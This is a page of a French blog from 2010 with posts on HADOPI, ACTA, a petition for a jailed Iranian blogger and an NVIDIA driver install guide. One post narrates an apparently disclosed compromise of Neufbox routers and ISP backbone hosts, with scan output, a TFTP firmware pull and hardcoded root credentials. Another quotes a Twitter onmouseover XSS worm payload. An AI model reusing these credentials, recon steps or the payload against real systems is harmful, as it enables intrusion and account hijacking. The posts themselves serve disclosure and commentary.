☠ Bluetouff's blog – Page 23 – Sous les octets, la plage …

25 septembre 201026 septembre 2010

Hadopi.fr : un intérêt manifeste

Parmi les outils de veille sur le réseau que j’affectionne, il y a Pastebin, on y trouve vraiment de tout, et pas que du code. Numerama signalait hier que le site Hadopi.fr, alors qu’il n’est toujours pas officiellement en ligne (même si le cache Google parle…), attirais déjà de nombreux curieux. Bien entendu, Pastebin atteste de la véracité de ces propos, on y trouve par exemple :

des scans nmap ;
un dig sur le domaine *.hadopi.fr.. et encore un ici … Bravo Pablo 😉 ;
Un traceroute ;
On trouve aussi des bribes de contre argumentaires comme celui ci qui nous mène aussi au plan de bataille
…

Rien de bien méchant, mais effectivement, Hadopi.fr fait l’objet d’attentions particulières, des attaques par déni de services avaient été annoncées aussitôt après les bruits sur la date de mise en ligne du site.

L’intérêt de ce DDoS est comme je vous le disais à mon sens limité et probablement dangereux en terme d’image… tout comme le serait un défacement, qui donnerait du pain béni aux personnes qui veulent policer l’internet en utilisant des outils autrement plus dangereux qu’une machine à spam, aussi coûteuse soit-elle. Espérons maintenant que les politiques éviteront les attaques inconsidérées qui attisent encore les crispations des uns et des autres… même des plus modérés.

Oui c’est compliqué, mais il n’y a pas de pédagogie vaine, il en restera toujours quelque chose… ce qui me permet d’enchaîner sur le billet suivant, dans lequel je vais tenter d’expliquer à madame Marland-Militello le combat d’arrière garde dont elle se gargarise ici… je pensais pas dire ça un jour mais je commence à regretter Frédéric Lefèbvre, ses attaques contre l’Internet étaient argumentées de manière bien plus drôles.

25 septembre 201025 septembre 2010

HADOPI : le jeu concours de la Quadrature du Net

Alors que la HADOPI s’apprête à lancer les premiers mails ( si, si … ça arrive), La Quadrature du Net lance un grand jeu concours pour désigner le vainqueur, à savoir la première personne qui recevra son mail d’avertissement. Une manière originale de marquer le coup, qui devrait en inciter plus d’un à vouloir jouer.

Le gagnant qui se verra remettre un bundle exceptionnel « même pas peur » :

un π-shirt (même moi j’en ai pas… et rien que pour ça je sens que je vais allumer la mule et bittorrent à fond les ballons pour downloader en boucle un ou deux blockbuster… mais vu que les premières adresses IP ont été fournies, je n’ai malheureusement que bien peu de chances d’être sélectionner),
Un exemplaire du considérant 12 de la décision 2009-580 du Conseil Constitutionnel, censurant l’HADOPI 1 et liant libertés d’expression à accès au Net, sorti d’une presse à imprimer du XIXè siècle … ça aussi… need <3;
Une IP de la société de police privée du Net Trident Media Guard … si le remote shell est fournit, need aussi <3;
Un coup à boire sur Paris ou ailleurs ;
Une suggestion de réponse à l’HADOPI.

Tout est ici

24 septembre 201024 septembre 2010

La menace Deep Packet Inspection : analyse de la compromission d’un FAI

L’analyse en profondeur de paquets (DPI) en coeur de réseau est le nouveau fantasme de la SCPP. Marc Guez son directeur ne doute pas un instant que grâce à cette solution miracle, il pourra reconnaître la légalité des octets qui transitent sur les réseaux des fournisseurs d’accès. En théorie, il n’est pas loin d’avoir raison. En pratique, c’est un peu moins sur… et du coup, je vais vous raconter une bien belle histoire, celle de Samir, aka sam_synack… une histoire encore parfaitement inconnue du grand public.

Ceci remonte à 2006, à l’époque, le fournisseur d’accès SFR s’appelait 9Télécom. Il distribuait des Neufbox à ses clients. À cette époque les Neufbox n’étaient pas équipées en GNU/Linux, le firmware était fermé et propriétaire. Mais un firmware fermé… ça s’ouvre. C’est bien ce qui est arrivé. Ce billet est assez technique, il dissèque la compromission du réseau d’un fournisseur d’accès Internet. Le détail du hack est ici relaté, vous comprendrez donc qu’il ne s’agit pas d’une fiction… c’est bien réel.

Analyse de la compromission de 300 000 Neufbox et du coeur de réseau d’un fournisseur d’accès par un gus dans son garage

Samir Bellabes, qui s’ennuyait en luttant contre ses insomnies, a eu la curiosité de commencer à causer avec sa Neufbox, fraîchement achetée quelque heures plus tôt… dramatiquement banal ? Attendez un peu, ce qui va suivre l’est un peu moins. La Neufbox se montre peu bavarde, mais animé par cette curiosité maladive qui anime tout hacker, Samir ne se décourage pas, il lui en faut bien plus. Sa méthode, simple et imparable, sniffer sur son réseau le trafic entre sa Neufbox et le Net et ainsi localiser le serveur depuis lequel elle se met à jour, récupérer ce firmware lors d’une mise à jour en dumpant les paquets. Appréciez la beauté du hack :

Samir scanne sa Neufbox : pas de résultat, pas grand chose à se mettre sous la dent hormis peut-être un port TCP 1287 à l’écoute à garder sous le coude :

sam@urg:~$ sudo nmap -sT 192.168.1.1 -p 1-65535
Starting Nmap 5.00 ( http://nmap.org ) at 2010-09-22 14:58 CEST
Interesting ports on 192.168.1.1:
Not shown: 65530 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
1287/tcp open unknown
1288/tcp open unknown
8080/tcp closed http-proxy

sam@urg:~$ telnet 192.168.1.1 1287
Trying 192.168.1.1…
Connected to 192.168.1.1.
Escape character is ‘^]’
.Foxconn VoIP TRIO 3C, F01L010.00_LDCOM MAC: , VOIP FLG=1
Login:

Il éteint sa Neufbox et la raccorde en ethernet à sa machine sur laquelle il lance tcpdump ;
La Neufbox effectue une requête « ARP, Request who-has 10.0.0.1 » vers sa machine, donc la neufbox recherche le serveur 10.0.0.1;
Bien entendu, sa machine ne peut répondre à cette requête ;
Samir débranche le RJ11 sur lequel le signal ADSL arrive dans la box, configure sa machine pour prendre l’adresse 10.0.0.1 et rallume la neufbox ;
Bingo, sa machine répond cette fois ci à la requête ;
Cette requête servait pour la box à déterminer où se trouve Internet et où se trouve le réseau local … Samir vient de tromper la Neufbox … sans une seule ligne de code ;
Une série de requêtes UDP et TCP se sont alors lancées depuis la Neufbox (recherche des serveurs de VoIP par exemple);
Mais le plus intéressant : une connexion UDP vers un serveur d’adresse publique 80.118.192.97, et vers un port de destination identifié comme du TFTP ;
Sur sa machine, Samir monte donc un serveur TFTP en écoute en attribuant arbitrairement à l’interface en écoute cette adresse publique ;
Il rallume sa box, et alors que la Neufbox cherche le serveur public, c’est sa machine qui répond, la Neufbox s’y connecte donc naturellement ;
La Neufbox demande à sa machine le fichier LatestVersion.general (listant les firmwares disponibles comme on le découvre plus tard);
Samir a donc maintenant assez d’informations pour aller chercher le vrai serveur public TFTP qui gère les mises à jour ;
Le firmware est capturé :

sam@fin:~/tmp$ tftp 80.118.192.97
tftp> get F01L010.00_LDCOM-V1.6.19_AV225165_V060419_00_full.tar
Received 1666745 bytes in 6.4 seconds
tftp> quit
sam@fin:~/tmp$ file *
F01L010.00_LDCOM-V1.6.19_AV225165_V060419_00_full.tar: data
LatestVersion.general: ASCII text

Et là, c’est le drame, une petite recherche dans le firmware sur la chaine de caractères « password » lui renvoit ceci :

httpd_username1=tibma
httpd_password1=ambit
httpd_username2=root
httpd_password2=aEzebRAWiF

Ces login/pass sont fonctionnels sur l’interface web de la Neufbox. Mais surtout retournons voir le CLI sur le port TCP 1287 et son prompt login, et là encore pas de souci, le mot de passe root permet d’être root sur la Neufbox.
Immédiatement on trouve le nom du CLI : ISOS et sa doc http://89.96.243.158/download/USERGUIDE/985_a02-ra3_cli.pdf
Il y a 2 interfaces (WAN et LAN) et l’interface WAN possède un adresse IP de classe privée du sous-réseau 172.16.0.0/12. (disons 172.16.42.42) … Curieux.
C’est là que Samir se rend compte qu’il peut envoyer du trafic à l’adresse IP voisine (par exemple 172.16.42.43, c’est à dire à une possible autre Neufbox. Un seul moyen de vérifier, se logger et éteindre cette Neufbox. C’est fait, le modem voisin ne répond plus.

La Neufbox de Samir est rootée, ainsi que plus de 300 000 de ses petites sœures !

En même temps qu’il recherche un mécanisme pour exploiter à grande échelle ces informations, il continue ses recherches basées sur les informations du firmware : les noms des serveurs donnant des adresses IP qui donnent des plages de réseau : 212.94.162.0, tftp.neufbox.neuf.fr, dhcp.neufbox.neuf.fr, ..

Et ce n’est pas fini…

Il scanne la plage IP, extrait :

Host pradius-dsl-2.gaoland.net (212.94.162.16) is up (0.039s latency).
Host mrtg.gaoland.net (212.94.162.5) is up (0.030s latency).
Host dns1.gaoland.net (212.94.162.1) is up (0.025s latency).
Host pippin.gaoland.net (212.94.162.15) is up (0.039s latency).
Host babar.gaoland.net (212.94.162.67) is up (0.027s latency).

Sur ce dernier serveur, le navigateur demande une authentification pour un mécanisme de sauvegarde à des routeurs BB IP … BACKBONE pwn3d !

Samir vient de taper à la porte du backbone… tout juste là où les partisans de la DPI souhaiteraient placer leurs équipements ! Le tout est accessible depuis le Net…. magnifique non ?

Et là vous vous dites que c’est blindé, pas moyen de passer ? Voici ce que trouve Samir : Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch Server at babar.gaoland.net … Blindé en effet … enfin presque.
Dans la suite de la recherche, une autre plage intéressante est aussi apparue :

inetnum: 80.118.192.0 – 80.118.197.255
netname: N9UF-INFRA
descr: BIB backbone

Happy End

Samir est un hacker sympa, pas un terroriste, il avertit donc aussitôt Neuf qui corrige, il n’a pas exploité ses trouvailles, il ne les a pas revendues sur une board russe… un vrai coup de bol pour les 300 000 abonnés de Neuf qu’il avait à portée de shell. Cette histoire n’a jamais filtré, c’était il y a 5 ans, et la révéler aujourd’hui ne porte pas préjudice au fournisseur d’accès. Par contre elle soulève des question très lourdes.

Que faut il retenir de cette petite histoire ?

Il n’en a pas fallu plus pour compromettre l’infrastructure du réseau de Neuf : un ordinateur et un gus dans son garage.. sans aucune ligne de code et toute l’infrastructure réseau d’un fournisseur d’accès est mise à nue. Cette même infrastructure au cœur de laquelle certains inconscients aimeraient placer des dispositifs d’écoute généralisée… à la portée de n’importe quel état, de n’importe quelle officine qui s’en donnerait les moyens… et d’un gus dans un garage !

Conclusion

La sécurité est un mécanisme global, qui fonctionne par des liens entres différents niveaux de couches et de services. Elle ne se résoud pas uniquement avec une boite gavée de GPU sur un lien réseau en terabit. Des entreprises voudraient utiliser les informations du réseau, vos informations, vos communications, afin de réaliser leur analyse et en déduire leur « légalité ». Il est clair que les solutions que la HADOPI a pour mission de labelliser seront des logiciels de lutte contre l’échange de fichiers. Ceci se fera au risque de compromettre la sécurité des utilisateurs et des entreprises. Là où on nous souffle le terme de « logiciels de sécurisation » et où le mot d’ordre est un concept aussi fumeux que la protection des lignes ADSL pour éviter de se rendre coupable d’un délit de « négligence caractérisée« , il faut bien lire « surveillance généralisée ». Si le grand public a un besoin réel de sécurisation, de confiance dans le réseau et de protection, il ne faut pas non plus nous faire prendre des vessies pour des lanternes : le produit Qosmos/Vedicis n’est pas une solution de securisation, mais bien de surveillance.

S’il fallait trouver un moyen efficace d’offrir l’opportunité à des personnes mal intentionnées de mettre la main sur les données personnelles de millions de particuliers et d’entreprises, nous ne pourrions pas mieux nous y prendre qu’en plaçant des équipements de DPI en cœur de réseau…

Voulez vous vraiment vous rendre coupable d’une négligence caractérisée mettant en péril notre sécurité nationale Monsieur Guez ? Pensez vous que la défense de vos intérêts (et non ceux des artistes) en vaut les risques encourus ?

Être conscient des peurs sur la DPI est une chose, prendre conscience des risques en est une autre. Il est grand temps que nos responsables politiques sifflent la fin de la récréation. Si les libertés individuelles ont une fâcheuse tendance à devenir un produit d’exportation, il est impératif que ces dispositifs dangereux pour la sécurité de nos concitoyens le restent.

23 septembre 201023 septembre 2010

HADOPI : DDoS annoncé pour accueillir Hadopi.fr

Cette fois ça y’est, le site de la HADOPI devrait ouvrir ses portes dés demain… et la riposte pas franchement graduée est en train de s’organiser sur les boards. Un appel on ne peut plus explicite au Raid a été lancé. C’était bien prévisible, Read Write Web avait même parlé de cette escalade très récemment. Selon les information de PcInpact, c’est Extelia qui pourrait bien déguster du /b/ (j’ai presque l’envie de vous dire qu’il s’agirait d’une réponse du berger à la bergère, mais mes propos pourraient être mal interprétés). L’appel aux armes lancé sur 4chan et déjà largement relayé porte les couleurs des Anonymous. En anglais, il atteste que le conflit est en train de s’internationaliser, et ça c’est une très mauvaise nouvelle pour les ayants droit.

Personnellement, je suis très réservé sur le bien fondé de ce raid…. Je comprends bien que ça nous démange tous, mais à l’heure actuelle ceci ne ferait que nous porter préjudice. Ce qui me dérange sur ce coup, c’est que j’ai l’impression qu’on se trompe de cible. Ce sont les ayants droit qui sont la cause du bridage de l’Internet, la HADOPI est une émanation de leur lobbying et ce serait donner ici à l’Autorité un argument de plus pour clore tout dialogue et de se lancer dans une application aussi stricte qu’absurde de la loi.

… et sarcastiquement, on pourrait aussi vous renvoyer que la bande passante cramée pour ce DDoS est sponsorisée par vos impôts.

23 septembre 201023 septembre 2010

Libérez Hossein ‘Hoder’ Derakhsha, condamné à mort par le régime iranien

Vous noterez qu’il est très rare que je relaie ce genre d’information, mais là, franchement, c’en est vraiment trop. Hossein ‘Hoder’ Derakhshan est un célèbre journaliste et blogger irano Canadien (son blog est le blog en langue persane le plus visité, ce qui lui a valu le surnom de Blogfather). Rien ne peut justifier la condamnation à mort d’Hossein.

C’est un très actif contributeur de Wikipedia sur tout ce qui touche à l’Iran, ce qui lui aura valu une arrestation en territoire Allemand et un interrogatoire par les services secrets iraniens, ce qu’il dénonça publiquement… un affront pour Téhéran.

Emprisonné en Iran depuis le premier octobre 2008, il a été condamné à mort le 22 septembre 2010, pour collaboration avec les gouvernements hostiles au régime.

Vous trouverez sur ce site une pétition contre cette condamnation inacceptable :

http://www.freetheblogfather.org/

Voici donc un communiqué que je vous invite à très largement relayer, tous les bloggers qui sont attachés à la liberté d’expression doivent se sentir concernés par le sort de Hossein :

APPEL D’UNE JEUNE FRANCAISE, SANDRINE MURCIA, POUR LA LIBERATION IMMEDIATE DE SON COMPAGNON
HOSSEIN DERAKHSHAN, BLOGGEUR ET JOURNALISTE IRANO-CANADIEN, DETENU A LA PRISON D’EVIN EN IRAN.
URGENCE : LE PROCUREUR DE TEHERAN A REQUIS LE 22 SEPTEMBRE LA PEINE DE MORT A SON ENCONTRE.

SAUVEZ HOSSEIN !

« Je lance un appel à la communauté internationale pour la libération de mon compagnon, Hossein Derakhshan, bloggeur et journaliste irano-canadien, surnommé Blogfather, arrêté en novembre 2008 et détenu à la prison de Evin, Téhéran, Iran depuis lors. Nous venons d’apprendre hier que le procureur de Téhéran a requis la peine de mort. Les jours qui viennent pourraient voir cette sentence confirmée par les autorités iraniennes, alors même qu’il n’a fait qu’exercer son métier de journaliste.

L’urgence est donc totale.

A l’heure où toutes les grandes nations se réunissent à New York, dans le cadre de l’Organisation des Nations Unies, c’est au Président Ahmadinejad et à toute la communauté internationale, que je souhaite m’adresser pour qu’Hossein retrouve très vite la liberté, au nom des droits de l’homme et de la liberté d’expression des journalistes. »

déclare Sandrine Murcia, fondatrice d’une agence conseil en services numériques, compagne d’Hossein, avec lequel elle partage la passion des nouvelles technologies de l’information et de la communication.

Hossein Derakhshan (né le 7 janvier 1975), mieux connu sous le pseudonyme de « Hoder », est un journaliste irano-canadien, webloger basé à Toronto puis à Paris. Son blog, rédigé en persan et en anglais, est un des blogs persanophones les plus visités. Hossein Derakhshan établit un manuel d’utilisation du blog, en persan, à l’usage des Iraniens. Ce manuel connait un tel succès qu’en un mois, plus de 100 blogs en persan sont créés. Il existe maintenant des dizaines de milliers de blogs en persan. Ce qui lui vaut le surnom de « Blogfather ».

Hossein Derakhshan débute dans le journalisme en écrivant des articles sur Internet dans le journal réformiste Asr-e-Azadegan. En décembre 2000, il part vivre au Canada, à Toronto, où il commence son blog, en persan, le 25 septembre 2001. Son titre : Sardabir : khodam (Editor : myself).

En 2005, Hossein Derakhshan tient un discours à la conférence Wikimania de Francfort, en Allemagne. Alors qu’il quitte l’Allemagne, il est arrêté et interrogé par les services secrets iraniens au sujet de ses contributions au Wikipédia en persan, et au sujet de sonblog. Il refuse alors de présenter des excuses publiques, comme cela lui est demandé. Au contraire, il rédige un rapport sur ce qui vient de lui arriver, qu’il publie sur son blog. Il travaille alors pour Newsweek, the Guardian, New York Times notamment.

Hossein Derakhshan se rend deux fois en Israël et publiquement rend compte de ses voyages dans son blog pour «contribuer au rapprochement entre Tel-Aviv et Téhéran». Pour un citoyen iranien, se rendre en Israël est passible de la peine de mort.

Très attaché à la culture française, aux valeurs des Lumières, il s’installe à Paris avec Sandrine Murcia en 2007 pour exercer son métier de journaliste et de bloggeur. Il se prend de passion pour les philosophes post-modernistes tels Foucault, Derrida et Deleuze.

Hossein Derakhshan retourne à Téhéran en octobre 2008 pour couvrir le 30ème anniversaire de la Révolution Iranienne et les élections présidentielles de juin 2009. Il est arrêté au domicile de ses parents le 1er novembre 2008. Maintenu en isolation et soumis aux interrogatoires, son procès s’ouvre en juin 2010 à huis clos. Sa famille n’a pas été autorisée à assister aux séances de la cour ni à le voir. Le procureur de Téhéran a requis la peine de mort pour Hossein Derakhshan, accusé de collaboration avec des gouvernements hostiles au régime, d’actes de propagande à l‘encontre des intérêts de la République Islamique, d’insultes aux symboles religieux.

Aidez-nous à libérer Hossein Derakhshan !

A Paris, le 23 septembre.

Signez la pétition en ligne:

http://www.freetheblogfather.org/

Facebook: Libérez Hossein Derakhshan // Free Hossein Derakhshan

http://www.facebook.com/group.php?gid=37459792838

Contact:

Sandrine Murcia
[email protected]
+33 6 25 90 11 58

21 septembre 201022 septembre 2010

HADOPI : 800 gagnants pour le premier tirage… combien au grattage ?

Aujourd’hui, la Haute Autorité a communiqué une liste de 800 adresses IP pour identification en vue des premiers envois de mails. Ce sont donc 800 foyers qui devraient prochainement recevoir (ou pas) les premiers mails certifiés conformes (ou pas) de la HADOPI. Contrairement à ce que beaucoup prédisaient (moi le premier), le taux de faux positifs sur les premiers envois devrait être minime. On m’a assuré que les ip « flashées » avaient fait l’objet d’une attention toute particulière, et on comprend pourquoi : d’importants couacs sur les premiers heureux gagnants seraient un mauvais, un très mauvais signal. Tout a donc été fait pour minimiser la part d’aléas inéluctables.

Là où ça coince :

Toujours pas l’ombre d’un début de piste de procédure formelle de contestation en cas d’erreur ;
Toujours pas l’ombre d’un début de négociation avec les ayants droit pour une offre légale ;
Toujours pas l’ombre d’une définition de la connexion internet que l’on est sensé sécuriser ;
Toujours pas l’ombre d’une solution miracle de sécurisation ;
Toujours pas l’ombre d’une garantie quelconque contre une sanction injuste ;
Toujours pas l’ombre d’une preuve que les soit disant pirates se sont enrichis en téléchargeant René la Taupe ;
Toujours pas d’obligation légale faite à mon FAI chéri d’arrêter de livrer ses points d’accès avec du Wep activé par défaut.

… vu d’ici, on dirait presque que la charrue ait été placée avant les boeufs et on s’oriente plus vers une réponse dégradée à un problème non mesuré, que vers une riposte graduée.

Notez qu’on se fiche bien de savoir si vous avez téléchargé un MP3 d’Enrico Macias et êtes devenu le 18e internaute à ainsi contribuer à sa ruine, ce qu’on sanctionne ici c’est une négligence caractérisée. Non pas que vous ayez téléchargé ce MP3 par inadvertance en tentant de vous procurer une ouverture de Bach passée dans le domaine public, mais bien que vous êtres trop crétin pour savoir qu’un flaw dans TKIP permet un Man in the Middle… sombre crétin que vous êtes, je vous l’avais pourtant expliqué ici !

Mais tout ceci reste un déroulement logique dans le calendrier de la mise en place des procédures induites par la loi, on ne peut donc s’en étonner. En revanche, il va y avoir un risque important de voir certains fournisseurs d’accès Internet proposer leur Hadopipoware. Au menu je vous prédis :

une exploitation mal venue de l’effet de communication induite par les premiers envois de mails ;
des solutions de Deep Packet Inspection sur abonnement pour se passer des contraintes légales que la violation de vos communications implique en droit français ;
de faux mails qui accentueront l’effet bénéfique pour le portefeuille des marchands de sécurité à 5 euros par mois.

Les risques sont bien réels , on a déjà vu ce que ceci pouvait donner et franchement, ceci n’est pas fait pour rassurer. Il faut espérer que la Haute Autorité mette un point d’honneur à prendre des distances avec ce qui représente une véritable menace pour tous, tant sur le plan des libertés individuelles que sur le plan de la sécurité. C’est donc maintenant, plus que jamais, qu’il va falloir observer les ayants droit qui nous promettent du DPI, les fournisseurs d’accès qui se verraient bien le vendre, et les équipementiers qui vont nous sortir leurs solutions miracles dans peu de temps.

21 septembre 201021 septembre 2010

Chassez l’ACTA et il revient au Gallo !

Le rapport Gallo, sera présenté demain, 22 septembre, au Parlement Européen. Ce rapport soutien le côté le plus obscur et le plus contestable de ce que l’ACTA porte. Sous prétexte de défense du droit d’auteur, c’est à une atteinte aux libertés des auteurs qu’il représente, contestant ou négligeant les exceptions au droit d’auteur dans le plus grand mépris de l’intérêt général.

Le rapport Gallo, très en phase avec la politique menée en France sur la sacralisation outrancière du droit d’auteur dans le mépris des libertés individuelles,encourage la répression préconisée dans la ligne dure de l’ACTA et se livre à ces sempiternels amalgames entre contrefaçon de biens matériels et l’échange de fichiers sur Internet. Encore une fois, tout est fait pour présenter le déclin des industries culturelles comme une conséquence de l’échange de fichiers sur Internet, un véritable non sens, argument déjà maintes fois démonté par des études indépendantes qui concluent toutes sur les effets bénéfiques de l’échange sur les ventes de ces biens culturels.

La pauvreté de ce rapport se traduit par une énième volonté de sensibilisation des citoyens aux vertus de la propriété intellectuelle à outrance au détriment de l’intérêt public, une belle farce quand on voit ce qu’est aujourd’hui l’offre légale : une petite épicerie de quartier face à n’importe quel tracker torrent moyen.

Nous nous devons de suivre, avec la plus extrême vigilance le vote de demain, car si la Déclaration 12 récemment adoptée par une majorité d’eurodéputés pourrait tendre à faire penser que le rapport Gallo va naturellement être rejeté, on sait que la politique européenne peut se jouer à, sur un malentendu, à une très courte majorité, entretenu par la résolution alternative de la ALDE qui tente de charmer les plus indécis. Cette résolution alternative de la ALDE reste un faux nez des positions inacceptables de l’ACTA qui prône entre autre une répression mondiale en se passant du juge, par des officines mandatées par les croisés du copyright. C’est d’ailleurs souvent là où les attend les moins que les horreurs d’ACTA nous reviennent régulièrement.

Espérons donc que la résolution des verts européens l’emportera demain et que le rapport Gallo sera rejeté, il n’est toujours pas trop tard pour appeler vos eurodéputés.

Répondez à l’appel de la Quadratrure du Net et participez en 5 minutes au rejet du rapport Gallo!

21 septembre 201021 septembre 2010

Twitter et le worm du onmouseover

Comme de nombreuses personnes, je me suis fait piéger en utilisant un bouton de retweet… enfin piégé, comme les contacts qui me l’ont filé et comme les contacts à qui je l’ai refilé, en fait c’est imparable, le seul moyen de l’éviter est de ne pas se rendre sur twitter.com. Vous vous doutez bien que certains n’ont pas manqué l’occasion de me taquiner, et ils ont raison. Leur point commun : aucun d’entre eux n’utilise l’interface web mais un client Twitter. Les clients tiers ne sont pas concernés (enfin s’ils n’executent pas de javascript douteux et non du Java comme j’ai pu le lire dans la presse). Cest bien le site web de Twitter qui est affecté et il est donc vivement recommandé de ne pas l’utiliser pour le moment, rabattez vous sur un client qui gère les script/noscript plus correctement que le site web lui même. C’est un XSS qui est actuellement exploité et que les utilisateurs se refilent gentiment. Tout ceci ne fait qu’apporter un peu plus d’eau au moulin sur une question que je m’étais posé en lisant le décret d’application HADOPI qui touche à la sécusation de sa connexion Internet :

où s’arrête la connexion Internet que je suis sensé sécuriser ?

Réponse A : à ma machine ?
Réponse B : à ma box ?
Réponse C : au noeud de raccordement de mon opérateur ?
Réponse D : au site web que je visite ?

… voici la démonstration parfaite que sécuriser une « connexion Internet » ne veut RIEN dire ! La vulnérabilité exploitée sur Twitter peut servir à compromettre des millions de données de particuliers, et donc des accès à leur LAN, ajoutez à ça que tout se retrouve en ce moment sur pastebin.. public… Sur ce point, n’en déplaise à certains experts, tout expert soient ils, plaider en faveur de la sanction des utilisateurs est une ânerie.

Je n’ai pas observé de vol de compte ou autre vol de session dans le submit de l’url générée par la connexion via le mouseover, mais une exploitation plus méchante pourrait faire beaucoup de mal. Le worm renvoi à une url piégée qui peut contaminer votre machine (je n’ai pas eu ce privilège car je ne suis pas sur Windows, je n’ai pas eu le droit à une redirection et je n’ai pas cliqué sur l’url générée), mais il serait intéressant d’aller jeter un oeil sur les malwares qui s’y trouvent.. Cependant je m’excuse auprès des follower auxquels j’ai surement transmis le tweet piégé (je l’ai aussitôt effacé de ma timeline).

La source viendrait d’un compte créé pour l’occasion @rainbowtwtr, le poc est très simple, ça nous donne un truc du type :

http://twitter.com/pwn3d@ « onmouseover = » javascript: window.location = « http://www.urlpiegee.com ‘,’ /

… simple mais efficace. Attendez vous à des variantes aujourd’hui même qui pourraient être plus méchantes, le risque est présent tant que twitter n’aura pas corrigé la vulnérabilité exploitée sur son propre site.

Comme Google en atteste, ce worm fait mal avec plus de 18000 réponses pour le moment (Twitter étant un média social viral par excellence, c’est un terrain de choix pour la propagation de ce genre de choses).

Le conseil du moment : utilisez un client Twitter (une extension pour votre navigateur ou autre, mais ne passer pas par le site twitter.com

20 septembre 201021 septembre 2010

Ubuntu : configuration NVIDIA GT 220 aux petits oignons

Ubuntu est un OS que j’utilise très volontiers sur un mon desktop. Sa simplicité d’utilisation et d’installation en font un système que l’on peut recommander à n’importe quelle personne voulant s’adonner à la découverte de GNU/Linux. Cependant, il arrive, comme pour tout système d’exploitation, que certaines choses fonctionnent plus ou moins bien. J’ai expérimenté quelques petites galères ce soir, rien de bien grave, mais je me suis dit que faire un petit billet là dessus pourrait peut être aider quelques personnes qui se retrouveraient dans la même panade.

Ma carte graphique, une NVIDIA GT220, suite à je ne sais trop quelle manipulation stupide de ma part, ne voulait plus rien entendre, impossible d’avoir mon Compiz fonctionnel sur mes deux écrans. Après quelques désinstallations / réinstallations via les packages et quelques reconfigurations de Xorg, je me suis résigné à tout virer pour partir du binaire tout propriétaire et sale de NVIDIA. La manipulation n’est franchement pas complexe :

1° On commence par récupérer notre binaire ici (si votre architecture est en 32bits, prenez soin de ne pas télécharger celui ci mais celui qui correspond à votre architecture), il s’agit de la version 190.53 au moment où j’écris ces lignes. Une fois le pilot téléchargé, il va falloir le rendre exécutable. Pour ce faire, faites un clic droit sur le binaire, cliquez sur l’onglet permissions, et vers le bas de la fenêtre, à la ligne exécution, cochez « autoriser l’exécution du fichier comme un programme. »

2° On installe les kernel headers de notre noyau (installez les sources pour votre version de kernel en prenant soin de vérifier avec la commande uname, il est probable que nous n’ayons pas le même noyau) :

$ uname -a Linux hysteria 2.6.32-24-server #43-Ubuntu SMP Thu Sep 16 16:05:42 UTC 2010 x86_64 GNU/Linux $ sudo apt-get install linux-headers-2.6.32-24-server

3° On passe maintenant à l’installation du driver. On commence par fermer son X :

$ sudo /etc/init.d/gdm stop

Puis on lance l’installation :

$ cd Bureau $ sudo ./NVIDIA-Linux-x86_64-190.53-pkg2.run

… laissez vous guider, tout devrait se passer en douceur. A l’issue de l’installation, redémarrez votre X :

$ sudo /etc/init.d/gdm start

Et vous voilà avec une build toute fraîche qui devrait vous permettre de profiter de l’accélération graphique de votre carte. Ici en mode multi screen :

17 septembre 201017 septembre 2010

3615 Militello Show

Vous vous souvenez peut être de Muriel Marland Militello qui expliquait que ce n’était pas les internautes qui comptaient dans une démocratie mais les concitoyens (toi l’internaute qui me lit, tu es un citoyen en carton), ou encore de ses prestations dans l’hémicycle pendant les débats sur HADOPI… moi, anéfé, je me souviens parfaitement d’une incompétence crasse d’un élu en service commandé qui soutenait des positions martiennes argumentées par un néant abyssal. Ses précieux avis font d’HADOPI un texte inapplicable … et inappliqué… Madame Militello n’en est pourtant pas peu fière, et passer de la protection des animaux à Internet semble vécu par la député comme une promotion naturelle et bien méritée (il est acquis qu’Internet étant peuplé de zoophiles, il ne s’agit là que d’une extension de son combat au numérique).

Dans sa dernière sortie, Muriel Marland Militello s’en prend au référé de FDN devant le Conseil d’État que je vous laisse découvrir ici. Je vous invite à le mettre en perspective de ce splendide billet, qui aussi inconsistant soit-il, a le mérite de mettre en exergue, une fois de plus le décalage qui existe entre les promesses d’un texte vide : « on va sauver les artistes », et la réalité « on chouchoute la SCPP et quelques organismes parasites… et on laisse crever les artistes». J’aimerais sincèrement, madame le député, que vous m’expliquiez comment votre oeuvre sauve les artistes que les pirates flagellent à coup de modem, à en croire l’illustration de votre magnifique billet. Tous les artistes que je connais n’attendent rien de votre texte. Pouvez vous donc nous développer ce que vous soutenez avoir à leur offrir ?

Vous noterez que j’ai eu la courtoisie d’attendre vendredi pour répondre à ce billet, je ne troll que ce jour là. L’ami Spyou a d’ailleurs su réagir plus vite, de mon côté, j’ai du me résoudre à me calmer un peu avant d’écrire ce billet, tant il est compliqué de ne pas répondre à la bêtise par la bêtise

En voiture Muriel !

Madame Marland Militello commence dans son billet par nous rappeler que sa grande expertise d’Internet et du numérique lui a valu le poste de « rapporteure pour avis » sur la loi HADOPI (un peu comme si on m’avait nommé hier chirurgien). Certains y verront l’une des raisons de l’inapplicabilité de ce texte, je me contenterai ici de souligner sa chance car l’avis des gens qui y connaissent quelque chose n’a, lui, jamais été pris en compte.

Dans un Etat de droit… où on fait tout de travers

J’aime beaucoup le couplet de madame le député sur l’État de droit qu’elle a visiblement un peu compris de travers, où elle assimile la protection de la propriété intellectuelle à un concept effrayant, le « cleanternet»… Je le retourne sous tous les sens… rien à faire, je ne comprends pas comment madame Militello arrive à la conclusion qu’HADOPI (allez je vous le redis encore une fois pour que ça rentre… toujours inappliquée et inapplicable) « contribue à développer un Internet civilisé, respectueux des libertés et des droits et devoirs de chacun ». N’oubliez pas que pour que tout ce petit monde soit civilisé, ça passe forcément par restreindre la liberté de la presse. A ce jour, outre un climat délétère que madame Militello aime à entretenir, HADOPI contribue surtout à enrichir des marchands d’octets au kilo.

Madame le député, il y a ici deux choses particulièrement choquantes dans cette petite éructation de pixels bien peu inspirée :

vous entérinez le fait qu’HADOPI est un dispositif de surveillance visant à rendre une jungle civilisée (vous avez du confondre avec la LOPPSI, HADOPI n’est qu’une coûteuse machine à spam… qui n’a toujours pas envoyé un seul mail). Vous offrez là une caricature parfaite qui colle à une certaine classe d’élus et qui est la principale raison de l’échec qui vous attend sur ce dossier.
vous affirmez ensuite, qu’HADOPI contribue au développement de l’offre légale… vous avez du louper l’épisode Jiwa, soit, mais j’aimerai vraiment ici que vous me citiez UNE SEULE mesure visant à développer l’offre légale dans HADOPI… on ne doit vraiment pas vivre sur la même planète, ou alors c’est que nous n’avons pas le même texte sous les yeux.

